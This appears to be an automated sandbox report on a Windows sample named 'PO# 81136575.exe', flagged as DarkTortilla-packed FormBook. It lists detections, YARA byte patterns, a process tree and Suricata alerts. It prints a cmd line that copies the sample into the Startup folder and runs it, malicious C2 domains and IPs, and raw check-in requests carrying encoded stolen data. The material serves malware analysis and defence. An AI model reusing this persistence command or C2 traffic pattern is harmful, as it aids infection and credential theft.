Windows Analysis Report
PO# 81136575.exe

Overview

General Information

Sample name: PO# 81136575.exe
Analysis ID: 1564715
MD5: b353674e16431a7424571790d4d58f71
SHA1: eb356ac3d93bc0a61bd38929c3bdb46bbf6c1315
SHA256: 1e474cdeeb0981210d4a74fd907bf35076bd839cdaed665bfcd6360557797895

Detection

DarkTortilla, FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected FormBook
.NET source code contains method to dynamically call methods (often used by packers)
Allocates memory in foreign processes
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Drops PE files to the startup folder
Found direct / indirect Syscall (likely to bypass EDR)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64native
  • PO# 81136575.exe (PID: 9020 cmdline: "C:\Users\user\Desktop\PO# 81136575.exe" MD5: B353674E16431A7424571790D4D58F71)
    • cmd.exe (PID: 5348 cmdline: "cmd" /c ping 127.0.0.1 -n 49 > nul && copy "C:\Users\user\Desktop\PO# 81136575.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe" && ping 127.0.0.1 -n 49 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • PING.EXE (PID: 8584 cmdline: ping 127.0.0.1 -n 49 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • PING.EXE (PID: 7428 cmdline: ping 127.0.0.1 -n 49 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • sage.exe (PID: 904 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe" MD5: B353674E16431A7424571790D4D58F71)
        • AddInProcess32.exe (PID: 5716 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
        • sages.exe (PID: 4024 cmdline: "C:\Users\user\AppData\Local\Temp\sages.exe" MD5: 0E362E7005823D0BEC3719B902ED6D62)
          • sages.exe (PID: 2128 cmdline: "C:\Users\user\AppData\Local\Temp\sages.exe" MD5: 0E362E7005823D0BEC3719B902ED6D62)
        • AddInProcess32.exe (PID: 3968 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • sage.exe (PID: 4568 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe" MD5: B353674E16431A7424571790D4D58F71)
    • AddInProcess32.exe (PID: 1096 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • RAVCpl64.exe (PID: 7520 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • clip.exe (PID: 8692 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
          • firefox.exe (PID: 708 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
    • sages.exe (PID: 7024 cmdline: "C:\Users\user\AppData\Local\Temp\sages.exe" MD5: 0E362E7005823D0BEC3719B902ED6D62)
      • sages.exe (PID: 8000 cmdline: "C:\Users\user\AppData\Local\Temp\sages.exe" MD5: 0E362E7005823D0BEC3719B902ED6D62)
    • AddInProcess32.exe (PID: 5156 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cleanup
Name: DarkTortilla
Description: DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging. From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Name: Formbook, Formbo
Description: FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
Attribution:
  • SWEED
  • Cobalt
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
No configs have been found
Source | Rule | Description | Author | Strings
00000012.00000002.2734341431.0000000001930000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000012.00000002.2734341431.0000000001930000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ba50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13c5f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000E.00000002.5995803549.0000000004140000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
00000018.00000002.5955097403.0000000002E00000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000018.00000002.5955097403.0000000002E00000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ba50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13c5f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
(24 entries in total; 5 shown)

Source | Rule | Description | Author | Strings
18.2.AddInProcess32.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
18.2.AddInProcess32.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ee63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17072:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
14.2.sage.exe.407aa5e.4.raw.unpack | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
0.2.PO# 81136575.exe.471a7fe.7.raw.unpack | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
0.2.PO# 81136575.exe.46c15fe.2.raw.unpack | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
(9 entries in total; 5 shown)

System Summary

Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\PO# 81136575.exe, ProcessId: 9020, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.lnk

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-28T18:56:51.299445+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49715 | 172.67.149.53 | 80 | TCP
2024-11-28T18:57:16.148350+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49719 | 217.70.184.50 | 80 | TCP
2024-11-28T18:57:30.197189+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49723 | 43.153.84.190 | 80 | TCP
2024-11-28T18:57:44.673982+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49727 | 23.225.34.75 | 80 | TCP
2024-11-28T18:57:58.403418+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49731 | 104.21.53.93 | 80 | TCP
2024-11-28T18:58:12.156845+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49735 | 13.248.169.48 | 80 | TCP
2024-11-28T18:58:26.762980+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49739 | 161.97.168.245 | 80 | TCP
2024-11-28T19:00:35.727456+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49744 | 84.32.84.32 | 80 | TCP
2024-11-28T19:00:50.833474+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49748 | 208.91.197.27 | 80 | TCP
2024-11-28T19:01:05.738803+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49752 | 172.247.159.68 | 80 | TCP
2024-11-28T19:01:20.102885+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49756 | 172.172.168.240 | 80 | TCP
2024-11-28T19:01:34.500064+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49760 | 38.47.207.120 | 80 | TCP
2024-11-28T19:01:48.567273+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49764 | 192.185.16.209 | 80 | TCP
2024-11-28T19:02:13.153245+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49765 | 172.67.149.53 | 80 | TCP
2024-11-28T19:02:27.284955+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49769 | 217.70.184.50 | 80 | TCP

AV Detection

Source: PO# 81136575.exe | Avira: detected
Source: http://www.homebizsuccess.blog | Avira URL Cloud: Label: malware
Source: http://homebizsuccess.blog/sn35/?VX=2Ljw85fE62irHv4CO6sOxtyqmKbvzO49yiJy4Znj95Je | Avira URL Cloud: Label: malware
Source: http://www.homebizsuccess.blog/sn35/ | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Avira: detection malicious, Label: TR/AVI.Agent.lusxc
Source: C:\Users\user\AppData\Local\Temp\sages.exe | Avira: detection malicious, Label: TR/Agent.able
Source: C:\Users\user\AppData\Local\Temp\sages.exe | ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | ReversingLabs: Detection: 73%
Source: PO# 81136575.exe | ReversingLabs: Detection: 73%
Source: Yara match | File source: 18.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000012.00000002.2734341431.0000000001930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.5955097403.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.5957899892.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2731267987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.5957820613.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.6031342259.000000000FC40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Joe Sandbox ML: detected
Source: PO# 81136575.exe | Joe Sandbox ML: detected
Source: PO# 81136575.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Windows.Forms.pdb | source: PO# 81136575.exe, 00000000.00000002.1263148906.0000000070B0B000.00000020.00000001.01000000.00000009.sdmp
Source: Binary string: System.Windows.Forms.ni.pdbRSDS | source: PO# 81136575.exe, 00000000.00000002.1263148906.0000000070B0B000.00000020.00000001.01000000.00000009.sdmp
Source: Binary string: System.Drawing.pdb | source: PO# 81136575.exe, 00000000.00000002.1272093452.0000000070CEB000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb | source: PO# 81136575.exe, 00000000.00000002.1263148906.0000000070B0B000.00000020.00000001.01000000.00000009.sdmp
Source: Binary string: wntdll.pdbUGP | source: AddInProcess32.exe, 00000012.00000002.2732638423.00000000014E0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000018.00000002.5958166544.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000018.00000002.5958166544.0000000004ECD000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2732328486.0000000004A4F000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2735637861.0000000004BF7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdb | source: PO# 81136575.exe, 00000000.00000002.1272093452.0000000070CEB000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: wntdll.pdb | source: AddInProcess32.exe, AddInProcess32.exe, 00000012.00000002.2732638423.00000000014E0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, clip.exe, 00000018.00000002.5958166544.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000018.00000002.5958166544.0000000004ECD000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2732328486.0000000004A4F000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2735637861.0000000004BF7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: clip.pdb | source: AddInProcess32.exe, 00000012.00000002.2731816086.0000000000F48000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS | source: PO# 81136575.exe, 00000000.00000002.1272093452.0000000070CEB000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: clip.pdbGCTL | source: AddInProcess32.exe, 00000012.00000002.2731816086.0000000000F48000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_02E1C010 FindFirstFileW,FindNextFileW,FindClose, | 24_2_02E1C010
Source: C:\Users\user\Desktop\PO# 81136575.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\PO# 81136575.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
Source: C:\Users\user\Desktop\PO# 81136575.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\PO# 81136575.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\PO# 81136575.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Desktop\PO# 81136575.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Code function: 4x nop then xor eax, eax | 14_2_0FCA74D0
Source: C:\Users\user\AppData\Local\Temp\sages.exe | Code function: 4x nop then jmp 01A30B9Fh | 21_2_01A30960
Source: C:\Users\user\AppData\Local\Temp\sages.exe | Code function: 4x nop then jmp 01A30B9Fh | 21_2_01A30955
Source: C:\Users\user\AppData\Local\Temp\sages.exe | Code function: 4x nop then jmp 026A0B9Fh | 22_2_026A0960
Source: C:\Users\user\AppData\Local\Temp\sages.exe | Code function: 4x nop then jmp 026A0B9Fh | 22_2_026A094F
Source: C:\Windows\SysWOW64\clip.exe | Code function: 4x nop then xor eax, eax | 24_2_02E09A90
Source: C:\Windows\SysWOW64\clip.exe | Code function: 4x nop then pop edi | 24_2_02E0DC31
Source: C:\Windows\SysWOW64\clip.exe | Code function: 4x nop then mov ebx, 00000004h | 24_2_050F04E6

Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49735 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49719 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49731 -> 104.21.53.93:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49723 -> 43.153.84.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49727 -> 23.225.34.75:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49752 -> 172.247.159.68:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49744 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49765 -> 172.67.149.53:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49739 -> 161.97.168.245:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49756 -> 172.172.168.240:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49748 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49764 -> 192.185.16.209:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49760 -> 38.47.207.120:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49769 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49715 -> 172.67.149.53:80
Source: DNS query: www.gfdgdfery.xyz
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 49
Source: Joe Sandbox View | IP Address: 217.70.184.50
Source: Joe Sandbox View | ASN Name: CNSERVERSUS
Source: Joe Sandbox View | ASN Name: LILLY-ASUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown | UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /rfr1/?YDrhw=DvQP9LC050182Z3&VX=F4hOgqu9W5FpVGQoAREgTite/5iXCZQ+jfwfTHlgxAY2vkqeiMz3vCoerVdgDkzWxU8N3qFnpYIa4u2RgKwz4Zn2GG0gDMAqCr9egx1VT+K5Ui7eAt5njHk= HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Host: www.1win-moldovia.fun
    Connection: close
    User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
Source: global traffic | HTTP traffic detected: GET /l1qb/?VX=j+zwo0WruX31giYaAXLqFZsOSDWIhP7jTa/dbVxGHcBqV/4l3NxJtgpmZpbROnG1sUhGxH62sOLj7xpOC5An+cKklQHM9vXGdSm+p7Uk9aee91hqvbKIz6k=&YDrhw=DvQP9LC050182Z3 HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Host: www.akravchenko.dev
    Connection: close
    User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
Source: global traffic | HTTP traffic detected: GET /jywy/?YDrhw=DvQP9LC050182Z3&VX=eSCeWRIoJNy1ChkNr9Mrph+bw9krj2HtA4M0Ycvj+4uTwHyRXe49PM8qrTbeBTFYTaFawzZELf0uMSg9ynQv9wCKXjtU0s3V3zZMSDWRvxGcx4r7U6700ik= HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Host: www.hubeisuizhou.net
    Connection: close
    User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
Source: global traffic | HTTP traffic detected: GET /wh2p/?VX=9+zt0j5vH1hwmuNu9M8ocWXwdarV/CDICdzwuxwNfU8HGUfYBmRRDoptJYgisjO2VNRkebPIiKpJv3rqkJwKZD01RYDx7edSJaNyhcvFUUhy7aDPpqjYjT4=&YDrhw=DvQP9LC050182Z3 HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Host: www.bashei.top
    Connection: close
    User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
Source: global traffic | HTTP traffic detected: GET /rfr1/?YDrhw=DvQP9LC050182Z3&VX=F4hOgqu9W5FpVGQoAREgTite/5iXCZQ+jfwfTHlgxAY2vkqeiMz3vCoerVdgDkzWxU8N3qFnpYIa4u2RgKwz4Zn2GG0gDMAqCr9egx1VT+K5Ui7eAt5njHk= HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Host: www.1win-moldovia.fun
    Connection: close
    User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
Source: global traffic | HTTP traffic detected: GET /l1qb/?VX=j+zwo0WruX31giYaAXLqFZsOSDWIhP7jTa/dbVxGHcBqV/4l3NxJtgpmZpbROnG1sUhGxH62sOLj7xpOC5An+cKklQHM9vXGdSm+p7Uk9aee91hqvbKIz6k=&YDrhw=DvQP9LC050182Z3 HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Host: www.akravchenko.dev
    Connection: close
    User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
Source: global traffic | DNS traffic detected: DNS query: www.1win-moldovia.fun
Source: global traffic | DNS traffic detected: DNS query: www.akravchenko.dev
Source: global traffic | DNS traffic detected: DNS query: www.hubeisuizhou.net
Source: global traffic | DNS traffic detected: DNS query: www.bashei.top
Source: global traffic | DNS traffic detected: DNS query: www.gfdgdfery.xyz
Source: global traffic | DNS traffic detected: DNS query: www.healthsolutions.top
Source: global traffic | DNS traffic detected: DNS query: www.affilamark.buzz
Source: global traffic | DNS traffic detected: DNS query: www.shedoes.top
Source: global traffic | DNS traffic detected: DNS query: www.torkstallningar.shop
Source: global traffic | DNS traffic detected: DNS query: www.aflaksokna.com
Source: global traffic | DNS traffic detected: DNS query: www.claudpinheiro.online
Source: global traffic | DNS traffic detected: DNS query: www.slwmarketing.online
Source: global traffic | DNS traffic detected: DNS query: www.56435.net
Source: global traffic | DNS traffic detected: DNS query: www.tekilla.wtf
Source: global traffic | DNS traffic detected: DNS query: www.tyai36.top
Source: global traffic | DNS traffic detected: DNS query: www.homebizsuccess.blog
Source: unknown | HTTP traffic detected: POST /l1qb/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.5
    Host: www.akravchenko.dev
    Origin: http://www.akravchenko.dev
    Referer: http://www.akravchenko.dev/l1qb/
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 199
    Connection: close
    User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
    Data Raw: 56 58 3d 75 38 62 51 72 45 2b 6f 6e 31 4c 56 72 69 6b 47 41 31 6a 4b 4c 4b 6f 73 5a 6d 47 6e 74 4e 4c 67 66 61 62 76 53 57 31 6e 4b 64 38 58 4d 61 63 74 2f 65 35 57 6a 43 5a 2b 47 6f 58 77 66 57 53 45 2f 45 70 53 7a 78 75 6f 36 5a 6a 65 69 79 35 59 47 59 56 42 77 50 36 77 73 43 4f 47 32 73 76 30 63 52 43 66 71 4c 52 65 79 74 69 71 37 6c 6c 50 78 4b 57 65 2b 35 36 4c 48 34 65 47 4a 2b 36 79 6b 37 52 67 4e 42 76 63 58 67 59 66 67 2f 4e 74 79 74 6d 37 4a 6c 65 43 6d 56 7a 6d 48 47 45 4d 33 75 44 47 62 37 73 65 57 69 32 72 6a 79 43 32 38 6f 2f 2f 49 39 31 42 67 46 2f 6f 35 38 51 63 2b 67 3d 3d
    Data Ascii: VX=u8bQrE+on1LVrikGA1jKLKosZmGntNLgfabvSW1nKd8XMact/e5WjCZ+GoXwfWSE/EpSzxuo6Zjeiy5YGYVBwP6wsCOG2sv0cRCfqLReytiq7llPxKWe+56LH4eGJ+6yk7RgNBvcXgYfg/Ntytm7JleCmVzmHGEM3uDGb7seWi2rjyC28o//I91BgF/o58Qc+g==
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 28 Nov 2024 17:57:21 GMT
    Content-Type: text/html
    Content-Length: 146
    Connection: close
